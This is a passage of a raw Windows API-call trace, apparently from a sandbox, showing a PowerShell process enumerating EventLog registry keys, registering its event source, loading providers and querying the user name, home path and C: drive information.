	[0167.854] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x5, lpName=0x584bc0, lpcchName=0x10e670, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x10e670, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.854] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x6, lpName=0x584bc0, lpcchName=0x10e670, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x10e670, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.854] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x7, lpName=0x584bc0, lpcchName=0x10e670, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x10e670, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.854] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x8, lpName=0x584bc0, lpcchName=0x10e670, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x10e670, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.854] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e61c | out: phkResult=0x10e61c*=0x320) returned 0x0
	[0167.855] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e61c | out: phkResult=0x10e61c*=0x0) returned 0x2
	[0167.855] RegOpenKeyExW (in: hKey=0x384, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e61c | out: phkResult=0x10e61c*=0x388) returned 0x0
	[0167.855] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e61c | out: phkResult=0x10e61c*=0x0) returned 0x2
	[0167.855] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e61c | out: phkResult=0x10e61c*=0x38c) returned 0x0
	[0167.855] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e61c | out: phkResult=0x10e61c*=0x0) returned 0x2
	[0167.855] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e61c | out: phkResult=0x10e61c*=0x390) returned 0x0
	[0167.855] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e61c | out: phkResult=0x10e61c*=0x0) returned 0x2
	[0167.856] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e61c | out: phkResult=0x10e61c*=0x394) returned 0x0
	[0167.856] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e61c | out: phkResult=0x10e61c*=0x0) returned 0x2
	[0167.856] RegOpenKeyExW (in: hKey=0x384, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e61c | out: phkResult=0x10e61c*=0x398) returned 0x0
	[0167.856] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e61c | out: phkResult=0x10e61c*=0x0) returned 0x2
	[0167.856] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e61c | out: phkResult=0x10e61c*=0x39c) returned 0x0
	[0167.856] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e61c | out: phkResult=0x10e61c*=0x0) returned 0x2
	[0167.857] RegOpenKeyExW (in: hKey=0x384, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e61c | out: phkResult=0x10e61c*=0x3a0) returned 0x0
	[0167.857] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e61c | out: phkResult=0x10e61c*=0x0) returned 0x2
	[0167.857] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e61c | out: phkResult=0x10e61c*=0x3a4) returned 0x0
	[0167.857] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e61c | out: phkResult=0x10e61c*=0x3a8) returned 0x0
	[0167.857] RegCloseKey (hKey=0x3a8) returned 0x0
	[0167.857] RegCloseKey (hKey=0x384) returned 0x0
	[0167.858] RegCloseKey (hKey=0x3a4) returned 0x0
	[0167.858] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e5e0 | out: phkResult=0x10e5e0*=0x3a4) returned 0x0
	[0167.858] RegQueryInfoKeyW (in: hKey=0x3a4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x10e648, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10e644, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x10e648*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10e644*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.858] RegEnumKeyExW (in: hKey=0x3a4, dwIndex=0x0, lpName=0x584bc0, lpcchName=0x10e664, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x10e664, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.859] RegEnumKeyExW (in: hKey=0x3a4, dwIndex=0x1, lpName=0x584bc0, lpcchName=0x10e664, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x10e664, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.859] RegEnumKeyExW (in: hKey=0x3a4, dwIndex=0x2, lpName=0x584bc0, lpcchName=0x10e664, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x10e664, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.859] RegEnumKeyExW (in: hKey=0x3a4, dwIndex=0x3, lpName=0x584bc0, lpcchName=0x10e664, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x10e664, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.859] RegEnumKeyExW (in: hKey=0x3a4, dwIndex=0x4, lpName=0x584bc0, lpcchName=0x10e664, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x10e664, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.859] RegEnumKeyExW (in: hKey=0x3a4, dwIndex=0x5, lpName=0x584bc0, lpcchName=0x10e664, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x10e664, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.860] RegEnumKeyExW (in: hKey=0x3a4, dwIndex=0x6, lpName=0x584bc0, lpcchName=0x10e664, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x10e664, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.860] RegEnumKeyExW (in: hKey=0x3a4, dwIndex=0x7, lpName=0x584bc0, lpcchName=0x10e664, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x10e664, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.860] RegEnumKeyExW (in: hKey=0x3a4, dwIndex=0x8, lpName=0x584bc0, lpcchName=0x10e664, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x10e664, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.860] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e610 | out: phkResult=0x10e610*=0x384) returned 0x0
	[0167.860] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e610 | out: phkResult=0x10e610*=0x0) returned 0x2
	[0167.861] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e610 | out: phkResult=0x10e610*=0x3a8) returned 0x0
	[0167.861] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e610 | out: phkResult=0x10e610*=0x0) returned 0x2
	[0167.861] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e610 | out: phkResult=0x10e610*=0x3ac) returned 0x0
	[0167.861] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e610 | out: phkResult=0x10e610*=0x0) returned 0x2
	[0167.861] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e610 | out: phkResult=0x10e610*=0x3b0) returned 0x0
	[0167.862] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e610 | out: phkResult=0x10e610*=0x0) returned 0x2
	[0167.862] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e610 | out: phkResult=0x10e610*=0x3b4) returned 0x0
	[0167.862] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e610 | out: phkResult=0x10e610*=0x0) returned 0x2
	[0167.862] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e610 | out: phkResult=0x10e610*=0x3b8) returned 0x0
	[0167.862] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e610 | out: phkResult=0x10e610*=0x0) returned 0x2
	[0167.862] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e610 | out: phkResult=0x10e610*=0x3bc) returned 0x0
	[0167.863] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e610 | out: phkResult=0x10e610*=0x0) returned 0x2
	[0167.863] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e610 | out: phkResult=0x10e610*=0x3c0) returned 0x0
	[0167.863] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e610 | out: phkResult=0x10e610*=0x0) returned 0x2
	[0167.863] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e610 | out: phkResult=0x10e610*=0x3c4) returned 0x0
	[0167.863] RegOpenKeyExW (in: hKey=0x3c4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e610 | out: phkResult=0x10e610*=0x3c8) returned 0x0
	[0167.863] RegCloseKey (hKey=0x3c8) returned 0x0
	[0167.863] RegCloseKey (hKey=0x3a4) returned 0x0
	[0167.864] RegCloseKey (hKey=0x3c4) returned 0x0
	[0168.139] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x4f60004
	[0168.300] GetLastError () returned 0x0
	[0168.302] ReportEventW (hEventLog=0x4f60004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2b60964*="WSMan", lpRawData=0x2b6080c) returned 1
	[0168.309] GetLastError () returned 0x0
	[0168.310] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0168.310] GetLastError () returned 0xcb
	[0168.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e184, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.311] GetLastError () returned 0xcb
	[0168.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e134, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.311] GetLastError () returned 0xcb
	[0168.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e134, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.311] GetLastError () returned 0xcb
	[0168.311] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x5f1fc0, nSize=0x10e784 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10e784) returned 0x1
	[0168.465] GetLastError () returned 0xcb
	[0168.466] GetUserNameW (in: lpBuffer=0x584bc0, pcbBuffer=0x10e78c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10e78c) returned 1
	[0168.466] ReportEventW (hEventLog=0x4f60004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2b64840*="Alias", lpRawData=0x2b646fc) returned 1
	[0168.471] GetLastError () returned 0x0
	[0168.473] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0168.473] GetLastError () returned 0xcb
	[0168.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e184, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.474] GetLastError () returned 0xcb
	[0168.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e134, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.474] GetLastError () returned 0xcb
	[0168.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e134, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.475] GetLastError () returned 0xcb
	[0168.475] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x5f1fc0, nSize=0x10e784 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10e784) returned 0x1
	[0168.475] GetLastError () returned 0xcb
	[0168.475] GetUserNameW (in: lpBuffer=0x584bc0, pcbBuffer=0x10e78c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10e78c) returned 1
	[0168.476] ReportEventW (hEventLog=0x4f60004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2b687d4*="Environment", lpRawData=0x2b68690) returned 1
	[0168.513] GetLastError () returned 0x0
	[0168.514] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0168.514] GetLastError () returned 0xcb
	[0168.515] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0168.515] GetLastError () returned 0xcb
	[0168.515] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0168.515] GetLastError () returned 0xcb
	[0168.516] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x10e2b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0168.516] GetLastError () returned 0xcb
	[0168.516] SetErrorMode (uMode=0x1) returned 0x1
	[0168.516] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x10e734 | out: lpFileInformation=0x10e734*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0168.516] GetLastError () returned 0xcb
	[0168.516] SetErrorMode (uMode=0x1) returned 0x1
	[0168.517] GetLogicalDrives () returned 0x4
	[0168.517] GetLastError () returned 0xcb
	[0168.517] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x10e1d8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0168.517] GetLastError () returned 0xcb
	[0168.519] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0168.519] GetLastError () returned 0xcb
	[0168.519] SetErrorMode (uMode=0x1) returned 0x1
	[0168.521] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x584cc0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x10e700, lpMaximumComponentLength=0x10e6fc, lpFileSystemFlags=0x10e6f8, lpFileSystemNameBuffer=0x584bc0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x10e700*=0x9c354b42, lpMaximumComponentLength=0x10e6fc*=0xff, lpFileSystemFlags=0x10e6f8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0168.521] GetLastError () returned 0xcb
	[0168.522] SetErrorMode (uMode=0x1) returned 0x1
	[0168.522] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0168.522] GetLastError () returned 0xcb
	[0168.522] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10e260, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0168.522] GetLastError () returned 0xcb
	[0168.522] SetErrorMode (uMode=0x1) returned 0x1
	[0168.522] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x2b69a0c | out: lpFileInformation=0x2b69a0c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0168.522] GetLastError () returned 0xcb
	[0168.522] SetErrorMode (uMode=0x1) returned 0x1
	[0168.522] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10e260, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0168.522] GetLastError () returned 0xcb
	[0168.522] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x10e1ec, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0168.522] GetLastError () returned 0xcb
	[0168.522] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0168.522] GetLastError () returned 0xcb
	[0168.524] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x10e1a8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0168.524] GetLastError () returned 0xcb
	[0168.524] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0168.524] GetLastError () returned 0xcb
	[0168.525] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10e1b0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0168.525] GetLastError () returned 0xcb
	[0168.525] SetErrorMode (uMode=0x1) returned 0x1
	[0168.525] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x2b6a664 | out: lpFileInformation=0x2b6a664*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0168.525] GetLastError () returned 0xcb
	[0168.526] SetErrorMode (uMode=0x1) returned 0x1
	[0168.526] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10e1b8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0168.526] GetLastError () returned 0xcb
	[0168.526] SetErrorMode (uMode=0x1) returned 0x1
	[0168.526] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x2b6a7b4 | out: lpFileInformation=0x2b6a7b4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0168.526] GetLastError () returned 0xcb
	[0168.526] SetErrorMode (uMode=0x1) returned 0x1
	[0168.526] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10e1fc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0168.526] GetLastError () returned 0xcb
	[0168.526] SetErrorMode (uMode=0x1) returned 0x1
	[0168.526] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x2b6a954 | out: lpFileInformation=0x2b6a954*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0168.526] GetLastError () returned 0xcb
	[0168.526] SetErrorMode (uMode=0x1) returned 0x1
	[0168.527] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x5f1fc0, nSize=0x10e784 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10e784) returned 0x1
	[0168.527] GetLastError () returned 0xcb
	[0168.527] GetUserNameW (in: lpBuffer=0x584bc0, pcbBuffer=0x10e78c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10e78c) returned 1
	[0168.528] ReportEventW (hEventLog=0x4f60004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2b6d6dc*="FileSystem", lpRawData=0x2b6d598) returned 1
	[0168.544] GetLastError () returned 0x0
	[0168.545] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0168.545] GetLastError () returned 0xcb
	[0168.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.546] GetLastError () returned 0xcb
	[0168.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.546] GetLastError () returned 0xcb
	[0168.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.547] GetLastError () returned 0xcb
	[0168.547] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x5f1fc0, nSize=0x10e784 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10e784) returned 0x1
	[0168.547] GetLastError () returned 0xcb
	[0168.547] GetUserNameW (in: lpBuffer=0x584bc0, pcbBuffer=0x10e78c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10e78c) returned 1
	[0168.548] ReportEventW (hEventLog=0x4f60004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2b717cc*="Function", lpRawData=0x2b71688) returned 1
	[0168.552] GetLastError () returned 0x0
	[0168.557] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0168.557] GetLastError () returned 0xcb
